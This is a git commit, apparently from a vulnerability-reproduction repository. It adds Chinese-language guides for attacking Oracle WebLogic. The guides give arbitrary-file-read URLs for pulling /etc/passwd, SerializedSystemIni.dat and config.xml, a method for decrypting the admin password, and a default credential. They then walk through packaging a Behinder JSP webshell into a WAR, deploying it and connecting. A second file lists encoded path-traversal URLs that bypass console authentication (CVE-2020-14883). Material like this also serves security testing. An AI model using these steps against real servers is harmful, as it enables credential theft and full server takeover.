add weblogic 未授权访问漏洞、弱口令&任意文件上传漏洞

This commit is contained in:
helloexp 2022-03-01 10:18:29 +08:00
parent c192a67d0f
commit 2cffafd25a
13 changed files with 55 additions and 1 deletions

View File

@ -1 +1,43 @@
#
# CVE-2019-2618 弱口令&任意文件上传漏洞
> 利用任意文件读取来获取weblogic的弱口令登录进入后台然后通过上传getshell通过构造任意文件下载漏洞环境读取到后台用户名和密码然后登陆进后台上传webshell。
## 影响版本
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
## 漏洞复现
1. 任意文件读取
访问`http://IP:7001/hello/file.jsp?path=/etc/passwd` 成功获取到账号和密码
![任意文件读取](images/任意文件读取.png) ![pass](images/password.png)
不过只能读取一些文件如何更深层次利用这个漏洞呢weblogic密码使用AES老版本3DES加密对称加密可解密只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件所以一定要用burpsuite来读取用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码这就是密钥右键copy to file就可以保存成一个文件
`http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat`
![SerializedSystemIni.dat](images/SerializedSystemIni.dat.png)
config.xml是base_domain的全局配置文件所以乱七八糟的内容比较多找到其中的的值即为加密后的管理员密码
`http://yourIP:7001/hello/file.jsp?path=config/config.xml`
![config.xml](images/config.xml.png)
使用解密工具进行解密
![decrypt](images/decrypt.png)
2. 后台上传getshell
使用解密后的账号密码登录后台weblogic常见的弱密码
`https://cirt.net/passwords?criteria=weblogic
这里使用 用户名:weblogic 密码:Oracle@123 登录`
进入后台后点击左边的部署,找到可以上传文件的地址
![deploy](images/deploy.png)
这里使用冰蝎里面自带的jsp一句话生成war马
`jar -cvf shell.war shell.jsp`
生成war后将war马部署上去
![muma1](images/muma1.png)
![muma1](images/muma2.png)
使用冰蝎进行连接(默认密码为rebeyond)成功getshell
![muma1](images/muma3.png)

Binary file not shown.

After

Width:  |  Height:  |  Size: 97 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 242 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 96 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 131 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 115 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 102 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 342 KiB

View File

@ -0,0 +1,12 @@
# weblogic 未授权访问漏洞
> 远程攻击者可以构造特殊的HTTP请求在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞CVE-2020-14883访问以下URL未授权访问到管理后台页面低权限的用户
>
```shell script
/console/images/%252E%252E%252Fconsole.portal
/console/css/%252e%252e%252fconsole.portal (小写可绕过补丁)
/console/css/%25%32%65%25%32%65%25%32%66console.portal
```
![console](images/console.png)
此时的权限很低,并不能在后台安装应用

Binary file not shown.

After

Width:  |  Height:  |  Size: 154 KiB